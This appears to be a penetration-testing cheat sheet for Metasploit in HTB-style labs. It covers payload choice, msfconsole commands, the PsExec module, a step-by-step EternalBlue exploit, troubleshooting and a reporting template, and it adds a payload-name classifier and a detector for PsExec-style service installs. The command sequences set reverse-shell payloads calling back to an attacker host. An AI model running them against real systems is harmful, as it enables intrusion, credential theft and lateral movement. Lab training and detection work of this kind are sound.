🛡️ Methodology Checklist
- Identify target OS, architecture, and available attack vector
- Search for payload: msfvenom --list payloads | grep -i [OS]
- Staged vs stageless decision: use staged for lower initial footprint
- Set up handler: use exploit/multi/handler; set PAYLOAD [PAYLOAD]; set LHOST/LPORT
- Generate payload with msfvenom
- Deliver payload via exploit, upload, or social engineering
- Catch session and migrate to stable process
🎯 Operational Context
Use when: Selecting payload type for MSF exploit — choose between staged/stageless, architecture, and format before generating.
Think Dumber First: Staged (windows/meterpreter/reverse_tcp) requires a second network connection back to pull stage 2 — use only when the callback path is reliable. Stageless (windows/meterpreter_reverse_tcp) is self-contained — use when the network is unreliable or port 4444 is blocked intermittently.
Skip when: Target has no MSF module — use standalone msfvenom payload.
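The staged/stageless and x64 distinctions above are encoded in the payload path itself. As an added example (not Metasploit's own code), the classifier below reads those conventions back out of a payload name and applies the selection rule from this section; the STAGES and TRANSPORTS lists are a constructed subset, not the full payload catalogue.

```python
"""Classify Metasploit payload names by their path conventions (added example).

A slash between stage and stager (windows/meterpreter/reverse_tcp) means staged:
the handler must serve stage 2 over a second connection. An underscore
(windows/meterpreter_reverse_tcp) means stageless: one self-contained blob.
A path segment of x64 marks a 64-bit payload; windows/ without it is 32-bit.
"""
from dataclasses import dataclass

# Constructed subset of stage and transport names seen in payload paths.
STAGES = ("meterpreter", "powershell", "shell", "vncinject")
TRANSPORTS = ("reverse_tcp", "bind_tcp", "reverse_https", "reverse_http")


@dataclass(frozen=True)
class PayloadInfo:
    platform: str
    arch: str        # "x64" or "x86" (MSF's default for windows/ is 32-bit)
    stage: str       # "meterpreter", "shell", ...; "single" for one-piece payloads
    transport: str
    staged: bool     # True when a stage-2 callback is required


def classify_payload(name: str) -> PayloadInfo:
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = "x86"
    if rest and rest[0] == "x64":
        arch, rest = "x64", rest[1:]
    if len(rest) == 2 and rest[0] in STAGES:
        # stage "/" stager: staged, handler must deliver stage 2
        return PayloadInfo(platform, arch, rest[0], rest[1], staged=True)
    if len(rest) == 1:
        for stage in STAGES:
            if rest[0].startswith(stage + "_"):
                # stage "_" stager: stageless, self-contained
                return PayloadInfo(platform, arch, stage, rest[0][len(stage) + 1:], staged=False)
        return PayloadInfo(platform, arch, "single", rest[0], staged=False)
    raise ValueError(f"unrecognised payload layout: {name!r}")


def pick_payload(platform: str, x64: bool, reliable_network: bool,
                 stage: str = "meterpreter", transport: str = "reverse_tcp") -> str:
    """Rule from the text: staged when the callback path is reliable (smaller
    initial footprint), stageless when stage 2 might never arrive."""
    arch_seg = "x64/" if x64 else ""
    sep = "/" if reliable_network else "_"
    return f"{platform}/{arch_seg}{stage}{sep}{transport}"
```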
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo msfconsole | Launch Metasploit (root required for privileged ports) |
| search smb | Search modules by keyword |
| search type:exploit name:psexec | Filtered module search |
| use exploit/windows/smb/psexec | Select module by full path |
| use 56 | Select module by search result number |
| show options | Display required and optional settings |
| set RHOSTS [TARGET_IP] | Set remote target IP |
| set LHOST tun0 | Set local (attacker) interface — always use tun0 for VPN |
| set LPORT 4444 | Set local listener port |
| set SMBUser [USER] | Set SMB username for authenticated exploits |
| set SMBPass [PASS] | Set SMB password |
| set payload windows/meterpreter/reverse_tcp | Switch to Meterpreter payload |
| set payload windows/shell/reverse_tcp | Switch to plain CMD shell payload |
| exploit | Run the selected module |
| use auxiliary/scanner/smb/smb_ms17_010 | MS17-010 (EternalBlue) scanner |
| use exploit/windows/smb/ms17_010_psexec | EternalBlue exploit (psexec variant — stable) |
| sessions -l | List active sessions |
| sessions -i 1 | Interact with session 1 |
🔬 Deep Dive & Workflow
MSF Standard Workflow
1. sudo msfconsole
2. search [keyword/CVE]
3. use [module]
4. show options
5. set RHOSTS [TARGET_IP]
6. set LHOST tun0
7. set LPORT [PORT]
8. exploit
Always use tun0 for LHOST when on HTB VPN — the module needs your VPN-facing IP, not your local LAN IP.
Module Rank Guide
| Rank | Meaning |
|---|---|
| Excellent | Reliable, won’t crash service |
| Great | Generally reliable |
| Good | Usually reliable |
| Normal | Default — may have limitations |
| Low | May crash or be unreliable |
| Manual | Requires manual steps |
PsExec Module Deep Dive (exploit/windows/smb/psexec)
How it works:
- Authenticates with SMBUser/SMBPass using valid admin credentials
- Uploads a randomly named service executable to ADMIN$
- Starts the service to execute the payload
- Shell connects back; service deleted to cover tracks
Why it fails:
- ADMIN$ requires Local Administrator rights — normal users can’t write there
- Windows Defender detects the service binary on disk → use Meterpreter or set target 0
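The behaviour described above (a randomly named executable written to ADMIN$, which maps to %SystemRoot%, then registered and started as a service) is also what a defender can key on. The following is an added example, not from the page or Metasploit: a heuristic over constructed Windows System-log entries for Event ID 7045 ("A service was installed in the system"); the thresholds in looks_random and the sample events are assumptions.

```python
"""Flag service installs matching the PsExec-module pattern (added example).

Signals: a 7045 service-install event whose service name looks auto-generated
and whose binary sits directly in %SystemRoot% (where the ADMIN$ share maps).
"""
import ntpath
import re

# Constructed sample events; keys follow the 7045 event's own field labels.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "hWqLdEcX",
     "ImagePath": r"C:\Windows\hWqLdEcX.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "gupdate",
     "ImagePath": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc",
     "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "hWqLdEcX", "ImagePath": "", "AccountName": ""},
]

VOWELS = set("aeiouAEIOU")


def looks_random(name: str) -> bool:
    """Alphabetic blob with many case flips or few vowels: the shape of a
    generated name rather than a product name. Thresholds are assumptions."""
    if not name.isalpha() or len(name) < 6:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.islower() != b.islower())
    vowel_ratio = sum(c in VOWELS for c in name) / len(name)
    return flips >= 3 or vowel_ratio < 0.2


def in_admin_share_root(image_path: str, system_root: str = r"C:\Windows") -> bool:
    """True when the executable sits directly in %SystemRoot% (ADMIN$ root)."""
    match = re.match(r'"?([^"]+?\.exe)', image_path, re.IGNORECASE)
    exe = match.group(1) if match else image_path.strip()
    return ntpath.dirname(exe).lower() == system_root.lower()


def flag_psexec_style_installs(events: list) -> list:
    """Return (service name, image path) for 7045 events matching both signals."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 7045:
            continue
        if looks_random(ev["ServiceName"]) and in_admin_share_root(ev["ImagePath"]):
            hits.append((ev["ServiceName"], ev["ImagePath"]))
    return hits


if __name__ == "__main__":
    for name, path in flag_psexec_style_installs(SAMPLE_EVENTS):
        print(f"suspicious service install: {name} -> {path}")
```

Pair this with the 7036 start/stop events and the short lifetime of the service (it is deleted after the shell connects) to raise confidence.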
Port Conflict — “Handler Failed to Bind”
If nc -lvnp 4444 is already running in another tab, MSF can’t bind its handler:
# Fix: change MSF listener port
set LPORT 5555
Always check active listeners before running MSF.
Meterpreter vs Shell Payload
| Feature | Meterpreter | Generic Shell |
|---|---|---|
| Disk write | No (in-memory DLL injection) | Sometimes |
| Commands | upload, download, hashdump, getsystem | Basic stdin/stdout |
| Stealth | More network traffic; DPI-detectable | Simpler, smaller |
| AV bypass | Sometimes better | Sometimes smaller = less flagged |
| Best for | Post-exploitation operations | Quick foothold, AV evasion |
EternalBlue Workflow (MS17-010)
# Step 1: Scan
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS [TARGET_IP]
run
# Step 2: Exploit (psexec variant is stable)
use exploit/windows/smb/ms17_010_psexec
set RHOSTS [TARGET_IP]
set LHOST tun0
set payload windows/meterpreter/reverse_tcp
exploit
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Staged payload fails to get shell | Stage 2 download blocked | Switch to stageless payload (meterpreter_reverse_tcp not meterpreter/reverse_tcp) |
| Payload arch mismatch | 32-bit payload on 64-bit process | Use x64 payloads: windows/x64/meterpreter/reverse_tcp for 64-bit targets |
| MSF module shows ‘no session created’ | Firewall blocking callback | Test: nc -nvlp [LPORT] on attack box; if connection arrives, problem is in payload encoding |
| Handler disconnects immediately | Payload expiry | Add set ExitOnSession false and set AutoRunScript post/multi/manage/shell_to_meterpreter |
| Multiple sessions created simultaneously | AutoRun on multi-target | Use set MaxSession 1 or manage per workspace |
📝 Reporting Trigger
Finding Title: Metasploit Payload Delivery Achieves Remote Code Execution
Impact: MSF payload execution provides an interactive Meterpreter session with full post-exploitation capabilities including credential dumping, pivoting, persistence, and lateral movement.
Root Cause: Exploitable service running as a privileged user with no EDR detection of Meterpreter staged payload delivery.
Recommendation: Deploy EDR capable of detecting Meterpreter stage 2 download patterns and shellcode injection. Implement network-level detection for Meterpreter communication patterns. Patch vulnerable services and apply least privilege to service accounts.